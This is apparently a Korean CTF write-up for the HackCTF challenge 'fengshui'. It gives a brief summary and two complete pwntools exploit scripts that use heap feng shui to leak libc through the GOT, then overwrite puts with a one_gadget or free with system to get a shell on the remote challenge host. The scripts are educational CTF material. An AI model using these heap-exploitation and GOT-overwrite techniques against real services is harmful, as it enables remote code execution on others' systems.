HackCTF
풍수지리설
Rasser
2022. 1. 13. 14:49
요약
- Heap의 레이아웃을 변경하여 공격하는 문제
- Heap Feng Shui를 이용
- 2개의 해답이 나올 수 있음(one_gadget을 이용하거나 system을 이용하는 방법)
공격방법
- Lazenca에서 나온 문제와 거의 동일함
- Lazenca 문제를 응용하면 됨
Exploit Code
1. one_gadget을 이용하는 방법
from pwn import *
context.log_level = 'debug'  # echo every byte exchanged with the service

# Connection to the challenge service; every helper below talks through it.
p = remote('ctf.j0n9hyun.xyz', 3028)
# Target binary (used for GOT addresses) and the libc shipped with the challenge
# (used for symbol offsets once the base is known).
e = ELF('./fengshui')
libc = ELF('./libc.so.6')

# one_gadget candidate offsets for the shipped libc.so.6; only one[0] is used below.
one = [
    0x3ac5c,
    0x3ac5e,
    0x3ac62,
    0x3ac69,
]
def add_location(desc_size, name, leng, data):
    """Menu option 0: create a location by answering the five prompts in order.

    ``desc_size`` and ``leng`` are sent as decimal strings; ``name`` and
    ``data`` go over the wire unchanged. Uses the module-level connection ``p``.
    """
    answers = (
        ('Choice: ', '0'),
        ('description: ', str(desc_size)),
        ('Name: ', name),
        ('length: ', str(leng)),
        ('Text: ', data),
    )
    for prompt, reply in answers:
        p.sendlineafter(prompt, reply)
def del_location(index):
    """Menu option 1: delete the location at ``index`` (sent as a decimal string)."""
    for prompt, reply in (('Choice: ', '1'), ('Index: ', str(index))):
        p.sendlineafter(prompt, reply)
def display(index):
    """Menu option 2: ask the service to print the location at ``index``.

    Only sends the request; the caller reads the response from ``p``.
    """
    for prompt, reply in (('Choice: ', '2'), ('Index: ', str(index))):
        p.sendlineafter(prompt, reply)
def update_location(index, length, data):
    """Menu option 3: rewrite the text of the location at ``index``.

    ``length`` is sent as a decimal string before ``data`` itself.
    """
    answers = (
        ('Choice: ', '3'),
        ('Index: ', str(index)),
        ('length: ', str(length)),
        ('Text: ', data),
    )
    for prompt, reply in answers:
        p.sendlineafter(prompt, reply)
# Allocate chunks: three locations, at indices 0, 1 and 2
add_location(10, 'A'*10, 10, 'a'*10)
add_location(10, 'B'*10, 10, 'b'*10)
add_location(10, 'C'*10, 10, 'c'*10)
# delete the location at index 0
del_location(0)
# heap feng shui
# Re-create the memory layout that existed before the free so the exploit can rely
# on it (translated from the original Korean comment). The payload ends with the GOT
# address of puts; the other constants (0x88, 0x11, 0x89) are tailored to this
# binary's chunk layout -- NOTE(review): confirm them against the target binary.
add_location(120, p32(0xcafebebe)*2, 160, p32(0xdeadbeef)*30+p32(0)*2+p32(0x88)+p32(0x11)+p32(0)*3+p32(0x89)+p32(e.got['puts']))
# leak libc base: display(1) is expected to print, after 'Description: ', the 4 bytes
# found at the address placed at the end of the payload above
display(1)
p.recvuntil('Description: ')
leak_puts = u32(p.recv(4))
libc_base = leak_puts - libc.symbols['puts']  # rebase using the known offset of puts
system = libc_base + libc.symbols['system']  # computed but unused in this variant
one_gadget = one[0] + libc_base  # first candidate from the list defined above
print('libc_base: ' + hex(libc_base))
# overwrite puts to one_gadget: a 4-byte write through index 1
update_location(1, 4, p32(one_gadget))
p.interactive()
2. System을 이용하는 방법
from pwn import *
# context.log_level = 'debug'  # uncomment to trace every byte exchanged with the service

# Connection to the challenge service; every helper below talks through it.
p = remote('ctf.j0n9hyun.xyz', 3028)
# Target binary (used for GOT addresses) and the libc shipped with the challenge
# (used for symbol offsets once the base is known).
e = ELF('./fengshui')
libc = ELF('./libc.so.6')

# one_gadget candidate offsets for the shipped libc.so.6 (not needed by the
# system-based variant, kept for parity with the first script).
one = [
    0x3ac5c,
    0x3ac5e,
    0x3ac62,
    0x3ac69,
]
def add_location(desc_size, name, leng, data):
    """Menu option 0: add a location by answering the five prompts in order.

    The numeric arguments are sent as decimal strings; ``name`` and ``data``
    go over the wire unchanged. Talks to the module-level connection ``p``.
    """
    send = p.sendlineafter
    send('Choice: ', '0')
    send('description: ', str(desc_size))
    send('Name: ', name)
    send('length: ', str(leng))
    send('Text: ', data)
def del_location(index):
    """Menu option 1: delete the location at ``index`` (sent as a decimal string)."""
    send = p.sendlineafter
    send('Choice: ', '1')
    send('Index: ', str(index))
def display(index):
    """Menu option 2: ask the service to print the location at ``index``.

    Only sends the request; the caller reads the response from ``p``.
    """
    send = p.sendlineafter
    send('Choice: ', '2')
    send('Index: ', str(index))
def update_location(index, length, data):
    """Menu option 3: rewrite the text of the location at ``index``.

    ``length`` is sent as a decimal string before ``data`` itself.
    """
    send = p.sendlineafter
    send('Choice: ', '3')
    send('Index: ', str(index))
    send('length: ', str(length))
    send('Text: ', data)
# Allocate chunks (the trailing comments give the index each call receives)
add_location(10, 'A'*10, 10, 'a'*10) # 0
add_location(10, 'B'*10, 10, 'b'*10) # 1
# index 2 holds "/bin/sh" as both name and text; it is deleted last, after free has
# been redirected to system
add_location(10, '/bin/sh\x00', 10, '/bin/sh\x00') # 2
# delete the location at index 0
del_location(0)
# heap feng shui: re-create the pre-free layout. Same payload as the one_gadget
# variant, but it ends with the GOT address of free instead of puts. The constants
# 0x88 / 0x11 / 0x89 are tailored to this binary -- NOTE(review): confirm them
# against the target binary.
add_location(120, p32(0xcafebebe)*2, 160, p32(0xdeadbeef)*30+p32(0)*2+p32(0x88)+p32(0x11)+p32(0)*3+p32(0x89)+p32(e.got['free'])) # 3
# leak libc base: display(1) is expected to print, after 'Description: ', the 4 bytes
# found at the address placed at the end of the payload above
display(1)
p.recvuntil('Description: ')
leak_puts = u32(p.recv(4))  # despite the name, this is the leaked address of free
libc_base = leak_puts - libc.symbols['free']  # rebase with free's offset, matching the GOT entry used above
system = libc_base + libc.symbols['system']
one_gadget = one[0] + libc_base  # computed but unused in this variant
print('libc_base: ' + hex(libc_base))
# overwrite free to system: a 4-byte write through index 1
update_location(1, 4, p32(system))
# free('/bin/sh\x00') -> system('/bin/sh\x00')
del_location(2)
p.interactive()
참조
https://www.lazenca.net/display/TEC/12.Heap+Feng+Shui